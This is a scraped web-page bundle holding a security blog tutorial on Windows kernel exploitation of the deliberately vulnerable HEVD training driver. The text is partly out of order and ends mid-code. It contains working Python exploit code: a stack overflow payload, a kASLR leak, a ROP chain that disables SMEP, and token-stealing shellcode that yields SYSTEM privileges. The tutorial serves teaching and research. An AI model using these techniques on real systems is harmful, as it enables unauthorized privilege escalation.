b'\\\\x00\\\\x00\\\\x89\\\\xc1\\\\x8b\\\\x89\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x81\\\\xe9\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x39'\\n    b'\\\\x91\\\\xb4\\\\x00\\\\x00\\\\x00\\\\x75\\\\xec\\\\x89\\\\xcf\\\\x89\\\\xc1\\\\x8b\\\\x89\\\\xb8\\\\x00\\\\x00\\\\x00'\\n    b'\\\\x81\\\\xe9\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x83\\\\xb9\\\\xb4\\\\x00\\\\x00\\\\x00\\\\x04\\\\x75\\\\xeb\\\\x81\\\\xc1'\\n    b'\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x8b\\\\x09\\\\x89\\\\x8f\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x61\\\\x31\\\\xc0\\\\x40\\\\x83'\\n    b'\\\\xc4\\\\x10\\\\x5d\\\\xc2\\\\x08\\\\x00'\\n)\\n\\nprint('Allocating memory for shellcode...')\\nRET_PTR = KERNEL32.VirtualAlloc(\\n    c_int(0),                    # lpAddress\\n    c_int(len(SHELLCODE)),       # dwSize\\n    c_int(0x3000),               # flAllocationType = MEM_COMMIT | MEM_RESERVE\\n    c_int(0x40)                  # flProtect = PAGE_EXECUTE_READWRITE\\n)\\n\\nprint('Moving shellcode to heap...')\\nKERNEL32.RtlMoveMemory(\\n    c_int(RET_PTR),              # Destination\\n    SHELLCODE,                   # Source\\n    c_int(len(SHELLCODE))        # Length\\n)\\n\\nprint('Creating ROP chain...')\\nROP_CHAIN = (\\n    struct.pack('<L', BASE_ADDRESS + 0x0002bbef) +     #  pop eax # ret\\n    struct.pack('<L', 0x42424242) +                    #  Padding for ret 8\\n    struct.pack('<L', 0x42424242) +                    #\\n    struct.pack('<L', 0x000406e9) +                    #  Value to disable SMEP\\n    struct.pack('<L', BASE_ADDRESS + 0x0011f8de) +     #  mov cr4, eax # ret\\n    struct.pack('<L', RET_PTR)                         #  Pointer to shellcode\\n)\\n\\nPAYLOAD = (\\n    b'A' * 2080 +\\n    ROP_CHAIN\\n)\\n\\nSIZE = len(PAYLOAD)\\n\\nprint('Opening driver handle...')\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nprint('Sending payload...')\\nHANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)\\nprint('Done.')\\n\\nsys.exit(0)\",language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"And check it:\"}),/*#__PURE__*/e(\"img\",{alt:\"Success to steal SYSTEM\",className:\"framer-image\",height:\"428\",src:\"https://framerusercontent.com/images/w68au5R5zQoFcuRt0AaugeKaB0.gif\",srcSet:\"https://framerusercontent.com/images/w68au5R5zQoFcuRt0AaugeKaB0.gif?scale-down-to=512 512w,https://framerusercontent.com/images/w68au5R5zQoFcuRt0AaugeKaB0.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/w68au5R5zQoFcuRt0AaugeKaB0.gif 1026w\",style:{aspectRatio:\"1026 / 856\"},width:\"513\"}),/*#__PURE__*/t(\"p\",{children:[\"Glorious! We were able to steal the token of the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process and copy it to our \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" shell. Now, we own the system!\"]}),/*#__PURE__*/e(\"h2\",{children:\"Conclusions\"}),/*#__PURE__*/t(\"p\",{children:[\"It was fun to steal the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process token and pass it to our own parent process. There are many other ways of gaining Local Privilege Escalation but this method is one of the most used because it is extremely reliable if you can restore the execution of the kernel.\"]})]});export const richText1=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"During the last posts, we\u2019ve been dealing with exploitation in Windows Kernel space. We are using \",/*#__PURE__*/e(r,{href:\"https://github.com/hacksysteam/HackSysExtremeVulnerableDriver\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"HackSys Extremely Vulnerable Driver\"})}),\" or \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" as the target which is composed of several vulnerabilities to let practitioners sharpen the Windows Kernel exploitation skills.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In the last \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-dos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"post\"})}),\", we successfully created a DoS exploit leveraging a stack overflow vulnerability in \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\". The DoS ocurred because we placed an arbitrary value on \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\" (\",/*#__PURE__*/e(\"code\",{children:\"41414141\"}),\") and when the OS tried to access that memory address, it was not accessible.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In this article, we will use that ability to overwrite \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\" to execute code in privileged mode.\"]}),/*#__PURE__*/t(\"p\",{children:[\"During the exploitation process, we will come across with Supervisor Mode Execution Prevention or \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" which will thwart our exploit. But fear not: we will be able to bypass it.\"]})]});export const richText2=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Local vs Remote exploitation\"}),/*#__PURE__*/t(\"p\",{children:[\"When we were exploiting Vulnserver, we were doing remote exploitation to a user-space application. That kind of environment has certain specific restrictions, the most notorious are limited buffer space to insert our payload, character restrictions and \",/*#__PURE__*/e(\"code\",{children:\"ASLR\"}),\" (Address Space Layout Randomization).\"]}),/*#__PURE__*/t(\"p\",{children:[\"When we are exploiting the Windows Kernel, it is assumed that we already have unprivileged local access to the target machine. In that environment, those restrictions are not longer a major issue. For example, the buffer space problem and character restrictions are easily circumvented by allocating dynamic memory with \",/*#__PURE__*/e(\"code\",{children:\"VirtualAlloc()\"}),\", moving the raw payload to that buffer and overwriting \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\" with the returned pointer.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"ASLR\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"kASLR\"}),\" (Kernel \",/*#__PURE__*/e(\"code\",{children:\"ASLR\"}),\") is not an issue either, because it works by randomizing the base memory of the modules at every restart, but if we have local access, there are functions in the Windows API that will reveal the current kernel base address.\"]}),/*#__PURE__*/t(\"p\",{children:[\"However, other protections come to the scene when trying to exploit at kernel level, like \",/*#__PURE__*/e(\"code\",{children:\"DEP\"}),\", \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\", \",/*#__PURE__*/e(\"code\",{children:\"CFG\"}),\", etc. We will surely come across with some of them later. Stay tuned.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Stack Overflow exploitation\"}),/*#__PURE__*/t(\"p\",{children:[\"We left off our \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-dos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"previous article\"})}),\" performing a DoS to the target machine, on where we used the following exploit:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:'#!/usr/bin/env python3\\n\"\"\"\\nHackSysExtremeVulnerableDrive Stack Overflow.\\n\\nVulnerable Software: HackSysExtremeVulnerableDrive\\nVersion: 3.00\\nExploit Author: Andres Roldan\\nTested On: Windows 10 1703\\nWriteup: https://fluidattacks.com/blog/hevd-smep-bypass/\\n\"\"\"\\n\\nfrom infi.wioctl import DeviceIoControl\\n\\nDEVICE_NAME = r\\'\\\\\\\\.\\\\HackSysExtremeVulnerableDriver\\'\\n\\nIOCTL_HEVD_STACK_OVERFLOW = 0x222003\\nSIZE = 3000\\n\\nPAYLOAD = (\\n    b\\'A\\' * SIZE\\n)\\n\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nHANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)',language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"And we were able to overwrite \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\" with the value \",/*#__PURE__*/e(\"code\",{children:\"41414141\"}),\". If we are going to perform something more interesting, we must start by locating the exact offset on which \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\" is overwritten. Just like on any other user-space exploitation process, we can create a cyclic pattern to find that offset. We can use \",/*#__PURE__*/e(\"code\",{children:\"mona\"}),\" to do that:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Using mona\",className:\"framer-image\",height:\"266\",src:\"https://framerusercontent.com/images/UCiBwXbSVyPC9UxJB4jbkTnlNRk.gif\",srcSet:\"https://framerusercontent.com/images/UCiBwXbSVyPC9UxJB4jbkTnlNRk.gif?scale-down-to=512 512w,https://framerusercontent.com/images/UCiBwXbSVyPC9UxJB4jbkTnlNRk.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/UCiBwXbSVyPC9UxJB4jbkTnlNRk.gif 1239w\",style:{aspectRatio:\"1239 / 532\"},width:\"619\"}),/*#__PURE__*/e(\"p\",{children:\"Then, update our exploit:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:'#!/usr/bin/env python3\\n\"\"\"\\nHackSysExtremeVulnerableDrive Stack Overflow.\\n\\nVulnerable Software: HackSysExtremeVulnerableDrive\\nVersion: 3.00\\nExploit Author: Andres Roldan\\nTested On: Windows 10 1703\\nWriteup: https://fluidattacks.com/blog/hevd-smep-bypass/\\n\"\"\"\\n\\nfrom infi.wioctl import DeviceIoControl\\n\\nDEVICE_NAME = r\\'\\\\\\\\.\\\\HackSysExtremeVulnerableDriver\\'\\n\\nIOCTL_HEVD_STACK_OVERFLOW = 0x222003\\n\\nPAYLOAD = (\\n b\\'<insert pattern here>\\'\\n)\\n\\nSIZE = len(PAYLOAD)\\n\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nHANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)',language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"And check it:\"}),/*#__PURE__*/e(\"img\",{alt:\"Checking updated exploit with mona\",className:\"framer-image\",height:\"790\",src:\"https://framerusercontent.com/images/m86dB5VIdUv3IjErcTYghLvdt74.gif\",srcSet:\"https://framerusercontent.com/images/m86dB5VIdUv3IjErcTYghLvdt74.gif?scale-down-to=1024 791w,https://framerusercontent.com/images/m86dB5VIdUv3IjErcTYghLvdt74.gif 1222w\",style:{aspectRatio:\"1222 / 1581\"},width:\"611\"}),/*#__PURE__*/t(\"p\",{children:[\"Good, \",/*#__PURE__*/e(\"code\",{children:\"mona\"}),\" discovered that EIP gets overwritten starting at byte \",/*#__PURE__*/e(\"code\",{children:\"2080\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"Now, for illustration purposes, we\u2019ll create a simple shellcode to make \",/*#__PURE__*/e(\"code\",{children:\"EAX = 0xdeadbeef\"}),\". Then, we must copy it in a dynamic generated location created by \",/*#__PURE__*/e(\"code\",{children:\"VirtualAlloc()\"}),\". The return value of \",/*#__PURE__*/e(\"code\",{children:\"VirtualAlloc()\"}),\" is a pointer that will be placed starting at byte 2081 of our buffer to divert the execution flow to our shellcode.\"]}),/*#__PURE__*/e(\"p\",{children:\"Let\u2019s update our exploit with that:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"#!/usr/bin/env python3\\n\\\"\\\"\\\"\\nHackSysExtremeVulnerableDrive Stack Overflow.\\n\\nVulnerable Software: HackSysExtremeVulnerableDrive\\nVersion: 3.00\\nExploit Author: Andres Roldan\\nTested On: Windows 10 1703\\nWriteup: https://fluidattacks.com/blog/hevd-smep-bypass/\\n\\\"\\\"\\\"\\n\\nimport struct\\nfrom ctypes import windll, c_int\\nfrom infi.wioctl import DeviceIoControl\\n\\nKERNEL32 = windll.kernel32\\nDEVICE_NAME = r'\\\\\\\\.\\\\HackSysExtremeVulnerableDriver'\\nIOCTL_HEVD_STACK_OVERFLOW = 0x222003\\n\\nSHELLCODE = (\\n b'\\\\xb8\\\\xef\\\\xbe\\\\xad\\\\xde' + # mov eax,0xdeadbeef\\n b'\\\\xcc' # INT3 -> software breakpoint\\n)\\n\\nRET_PTR = KERNEL32.VirtualAlloc(\\n    c_int(0),                    # lpAddress\\n    c_int(len(SHELLCODE)),       # dwSize\\n    c_int(0x3000),               # flAllocationType = MEM_COMMIT | MEM_RESERVE\\n    c_int(0x40)                  # flProtect = PAGE_EXECUTE_READWRITE\\n)\\n\\nKERNEL32.RtlMoveMemory(\\n    c_int(RET_PTR),              # Destination\\n    SHELLCODE,                   # Source\\n    c_int(len(SHELLCODE))        # Length\\n)\\n\\nPAYLOAD = (\\n    b'A' * 2080 +\\n    struct.pack('<L', RET_PTR)\\n)\\n\\nSIZE = len(PAYLOAD)\\n\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nHANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"If everything comes as expected, \",/*#__PURE__*/e(\"code\",{children:\"EAX\"}),\" will have the value \",/*#__PURE__*/e(\"code\",{children:\"0xdeadbeef\"}),\" and execution will pause at the inserted breakpoint \",/*#__PURE__*/e(\"code\",{children:\"\\\\xcc\"}),\". Let\u2019s check it:\"]}),/*#__PURE__*/e(\"img\",{alt:\"SMEP protects the kernel\",className:\"framer-image\",height:\"468\",src:\"https://framerusercontent.com/images/TUOjmBCTm4CSftICUQdmZyKa0.gif\",srcSet:\"https://framerusercontent.com/images/TUOjmBCTm4CSftICUQdmZyKa0.gif 841w\",style:{aspectRatio:\"841 / 937\"},width:\"420\"}),/*#__PURE__*/e(\"p\",{children:\"Ouch!\"}),/*#__PURE__*/t(\"p\",{children:[\"Our exploit was thwarted and the error \",/*#__PURE__*/e(\"code\",{children:\"ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY\"}),\" was triggered when the first instruction of our shellcode was trying to execute. That means that \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" did protect the kernel.\"]}),/*#__PURE__*/e(\"h2\",{children:\"SMEP: Supervisor Mode Execution Prevention\"}),/*#__PURE__*/t(\"p\",{children:[\"There\u2019s a concept called \",/*#__PURE__*/e(r,{href:\"https://en.wikipedia.org/wiki/Protection_ring\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"Protection rings\"})}),\" which is used by operating systems to delimit capabilities and provide fault tolerance, by defining levels of privileges. Windows OS versions uses only 2 Current Privilege Levels (\",/*#__PURE__*/e(\"code\",{children:\"CPL\"}),\"): 0 and 3. \",/*#__PURE__*/e(\"code\",{children:\"CPL\"}),\" levels are also referred as \",/*#__PURE__*/e(\"code\",{children:\"rings\"}),\". \",/*#__PURE__*/e(\"code\",{children:\"CPL0\"}),\" or \",/*#__PURE__*/e(\"code\",{children:\"ring-0\"}),\" is where the kernel is executed and \",/*#__PURE__*/e(\"code\",{children:\"CPL3\"}),\" or \",/*#__PURE__*/e(\"code\",{children:\"ring-3\"}),\" is where user mode instructions are performed.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" is a protection introduced at CPU-level which prevents the kernel to execute code belonging to \",/*#__PURE__*/e(\"code\",{children:\"ring-3\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"The \",/*#__PURE__*/e(\"code\",{children:\"ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY\"}),\" exception was triggered because \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" is executing at \",/*#__PURE__*/e(\"code\",{children:\"ring-0\"}),\" and after overwriting \",/*#__PURE__*/e(\"code\",{children:\"EIP\"}),\", it was trying to run the instructions in our shellcode which was allocated at \",/*#__PURE__*/e(\"code\",{children:\"ring-3\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"Technically, \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" is nothing but a bit in a CPU control register, specifically the 20th bit of the \",/*#__PURE__*/e(\"code\",{children:\"CR4\"}),\" control register:\"]}),/*#__PURE__*/e(\"img\",{alt:\"CR4 control register\",className:\"framer-image\",height:\"310\",src:\"https://framerusercontent.com/images/x67XE61jFGElmE7hoHP2KWli8.png\",srcSet:\"https://framerusercontent.com/images/x67XE61jFGElmE7hoHP2KWli8.png?scale-down-to=512 512w,https://framerusercontent.com/images/x67XE61jFGElmE7hoHP2KWli8.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/x67XE61jFGElmE7hoHP2KWli8.png 1920w\",style:{aspectRatio:\"1920 / 620\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"To bypass \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\", we must flip that bit (make it \",/*#__PURE__*/e(\"code\",{children:\"0\"}),\"). As can be seen, the current value of \",/*#__PURE__*/e(\"code\",{children:\"CR4\"}),\" with \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" enabled is \",/*#__PURE__*/e(\"code\",{children:\"001406e9\"}),\". Let\u2019s check what would be the value after flipping the 20th bit:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Flipping the 20th bit\",className:\"framer-image\",height:\"212\",src:\"https://framerusercontent.com/images/g0GTnEFRaVkOxug8W60Is3OrgCs.png\",srcSet:\"https://framerusercontent.com/images/g0GTnEFRaVkOxug8W60Is3OrgCs.png?scale-down-to=512 512w,https://framerusercontent.com/images/g0GTnEFRaVkOxug8W60Is3OrgCs.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/g0GTnEFRaVkOxug8W60Is3OrgCs.png 1920w\",style:{aspectRatio:\"1920 / 424\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"It would be \",/*#__PURE__*/e(\"code\",{children:\"000406e9\"}),\". We need to place that value on \",/*#__PURE__*/e(\"code\",{children:\"CR4\"}),\" to turn off \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"But, how can we do that if we are not allowed to execute instructions at \",/*#__PURE__*/e(\"code\",{children:\"ring-3\"}),\"? \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/bypassing-dep/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"ROP\"})}),\" comes to the rescue! We need to execute a \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" chain with instructions that are already in kernel mode. At \",/*#__PURE__*/e(\"code\",{children:\"ring-0\"}),\" \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" is often referred as \",/*#__PURE__*/e(\"code\",{children:\"kROP\"}),\". We then need to execute a \",/*#__PURE__*/e(\"code\",{children:\"kROP\"}),\" chain and change the value of \",/*#__PURE__*/e(\"code\",{children:\"CR4\"}),\". With that, we should be able to make \",/*#__PURE__*/e(\"code\",{children:\"EAX = 0xdeadbeef\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"In \",/*#__PURE__*/e(\"code\",{children:\"nt!KeFlushCurrentTb\"}),\", we find a gadget that sets \",/*#__PURE__*/e(\"code\",{children:\"CR4\"}),\" from whatever value \",/*#__PURE__*/e(\"code\",{children:\"EAX\"}),\" may have: \",/*#__PURE__*/e(\"code\",{children:\"mov cr4, eax # ret\"})]}),/*#__PURE__*/e(\"img\",{alt:\"CR4 from EAX values \",className:\"framer-image\",height:\"242\",src:\"https://framerusercontent.com/images/11Cl9HDPyD5nJskD8rlHPEmJ8ow.png\",srcSet:\"https://framerusercontent.com/images/11Cl9HDPyD5nJskD8rlHPEmJ8ow.png?scale-down-to=512 512w,https://framerusercontent.com/images/11Cl9HDPyD5nJskD8rlHPEmJ8ow.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/11Cl9HDPyD5nJskD8rlHPEmJ8ow.png 1920w\",style:{aspectRatio:\"1920 / 484\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Now, we need to calculate the offset of that \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" gadget from the start of the \",/*#__PURE__*/e(\"code\",{children:\"nt\"}),\" module:\"]}),/*#__PURE__*/e(\"img\",{alt:\"nt module\",className:\"framer-image\",height:\"377\",src:\"https://framerusercontent.com/images/Ipt7iwEdUCPSYlkxd7Q0XFmL4.png\",srcSet:\"https://framerusercontent.com/images/Ipt7iwEdUCPSYlkxd7Q0XFmL4.png?scale-down-to=512 512w,https://framerusercontent.com/images/Ipt7iwEdUCPSYlkxd7Q0XFmL4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/Ipt7iwEdUCPSYlkxd7Q0XFmL4.png 1920w\",style:{aspectRatio:\"1920 / 754\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"The offset is \",/*#__PURE__*/e(\"code\",{children:\"0011f8de\"}),\". We\u2019ll use that later.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Now we need to find a \",/*#__PURE__*/e(\"code\",{children:\"pop eax # ret\"}),\" gadget. We can find one at \",/*#__PURE__*/e(\"code\",{children:\"nt!_MapCMDevicePropertyToNtProperty+0x39\"}),\":\"]}),/*#__PURE__*/e(\"img\",{alt:\"nt!_MapCMDevicePropertyToNtProperty+0x39\",className:\"framer-image\",height:\"83\",src:\"https://framerusercontent.com/images/YkwBoNwJCZGhP9YeIrurh1uS6Q.png\",srcSet:\"https://framerusercontent.com/images/YkwBoNwJCZGhP9YeIrurh1uS6Q.png?scale-down-to=512 512w,https://framerusercontent.com/images/YkwBoNwJCZGhP9YeIrurh1uS6Q.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/YkwBoNwJCZGhP9YeIrurh1uS6Q.png 1920w\",style:{aspectRatio:\"1920 / 166\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"And the offset from the start of the \",/*#__PURE__*/e(\"code\",{children:\"nt\"}),\" module is \",/*#__PURE__*/e(\"code\",{children:\"0002bbef\"}),\":\"]}),/*#__PURE__*/e(\"img\",{alt:\"0002bbef\",className:\"framer-image\",height:\"157\",src:\"https://framerusercontent.com/images/iYrW0o90NJpwUx2cu0jcBKHPUIw.png\",srcSet:\"https://framerusercontent.com/images/iYrW0o90NJpwUx2cu0jcBKHPUIw.png?scale-down-to=512 512w,https://framerusercontent.com/images/iYrW0o90NJpwUx2cu0jcBKHPUIw.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/iYrW0o90NJpwUx2cu0jcBKHPUIw.png 1920w\",style:{aspectRatio:\"1920 / 314\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"We must remember to pad our \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" chain with 8 bytes because the overflowed function epilog uses \",/*#__PURE__*/e(\"code\",{children:\"ret 8\"}),\" which will return to the value pointed by \",/*#__PURE__*/e(\"code\",{children:\"ESP\"}),\" and then will pop 8 bytes from the stack:\"]}),/*#__PURE__*/e(\"img\",{alt:\"8 bytes from the stack\",className:\"framer-image\",height:\"102\",src:\"https://framerusercontent.com/images/qonilL2LUI1tp0x9GzFypkYzgUI.png\",srcSet:\"https://framerusercontent.com/images/qonilL2LUI1tp0x9GzFypkYzgUI.png?scale-down-to=512 512w,https://framerusercontent.com/images/qonilL2LUI1tp0x9GzFypkYzgUI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/qonilL2LUI1tp0x9GzFypkYzgUI.png 1920w\",style:{aspectRatio:\"1920 / 204\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"With that, we can now disable \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\"!\"]}),/*#__PURE__*/e(\"h2\",{children:\"Defeating kASLR\"}),/*#__PURE__*/t(\"p\",{children:[\"We\u2019ve got all the required information to create the \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" chain to disable \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\". However, we need to deal with kernel \",/*#__PURE__*/e(\"code\",{children:\"ASLR\"}),\". As I mentioned before, there are several functions that can be executed in user mode (\",/*#__PURE__*/e(\"code\",{children:\"ring-3\"}),\") that can give information of addresses at \",/*#__PURE__*/e(\"code\",{children:\"ring-0\"}),\". The most used are \",/*#__PURE__*/e(\"code\",{children:\"NtQuerySystemInformation()\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"EnumDeviceDrivers()\"}),\". The later is the simpler. With the following code, you can get the kernel base address:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:'import sys\\nfrom ctypes import windll, c_ulong, byref, sizeof\\n\\nPSAPI = windll.psapi\\n\\ndef get_kernel_base():\\n    \"\"\"Obtain kernel base address.\"\"\"\\n    buff_size = 0x4\\n\\n    base = (c_ulong * buff_size)(0)\\n\\n    if not PSAPI.EnumDeviceDrivers(base, sizeof(base), byref(c_ulong())):\\n        print(\\'Failed to get kernel base address.\\')\\n        sys.exit(1)\\n    return base[0]\\n\\nBASE_ADDRESS = get_kernel_base()\\nprint(f\\'Obtained kernel base address: {hex(BASE_ADDRESS)}\\')',language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"And check it:\"}),/*#__PURE__*/e(\"img\",{alt:\"0x81e09000\",className:\"framer-image\",height:\"192\",src:\"https://framerusercontent.com/images/IYJi1acy2TW3TCuC1JJmkl7jPt0.png\",srcSet:\"https://framerusercontent.com/images/IYJi1acy2TW3TCuC1JJmkl7jPt0.png?scale-down-to=512 512w,https://framerusercontent.com/images/IYJi1acy2TW3TCuC1JJmkl7jPt0.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/IYJi1acy2TW3TCuC1JJmkl7jPt0.png 1920w\",style:{aspectRatio:\"1920 / 384\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"As you can see, it matches perfectly to the address reported by \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\":\"]}),/*#__PURE__*/e(\"img\",{alt:\"Perfect match\",className:\"framer-image\",height:\"92\",src:\"https://framerusercontent.com/images/BkIomoYW3GZVpM45aegSljpfo.png\",srcSet:\"https://framerusercontent.com/images/BkIomoYW3GZVpM45aegSljpfo.png?scale-down-to=512 512w,https://framerusercontent.com/images/BkIomoYW3GZVpM45aegSljpfo.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/BkIomoYW3GZVpM45aegSljpfo.png 1920w\",style:{aspectRatio:\"1920 / 184\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"With that, we can update our exploit, adding the \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" chain to disable \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\", using the offsets of the gadgets and the value returned from that function to obtain absolute addresses, defeating \",/*#__PURE__*/e(\"code\",{children:\"kASLR\"}),\"!\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"#!/usr/bin/env python3\\n\\\"\\\"\\\"\\nHackSysExtremeVulnerableDrive Stack Overflow.\\n\\nVulnerable Software: HackSysExtremeVulnerableDrive\\nVersion: 3.00\\nExploit Author: Andres Roldan\\nTested On: Windows 10 1703\\nWriteup: https://fluidattacks.com/blog/hevd-smep-bypass/\\n\\\"\\\"\\\"\\n\\nimport struct\\nimport sys\\nfrom ctypes import windll, c_int, c_ulong, byref, sizeof\\nfrom infi.wioctl import DeviceIoControl\\n\\nKERNEL32 = windll.kernel32\\nPSAPI = windll.psapi\\nDEVICE_NAME = r'\\\\\\\\.\\\\HackSysExtremeVulnerableDriver'\\nIOCTL_HEVD_STACK_OVERFLOW = 0x222003\\n\\n\\ndef get_kernel_base():\\n \\\"\\\"\\\"Obtain kernel base address.\\\"\\\"\\\"\\n buff_size = 0x4\\n\\n base = (c_ulong * buff_size)(0)\\n\\n if not PSAPI.EnumDeviceDrivers(base, sizeof(base), 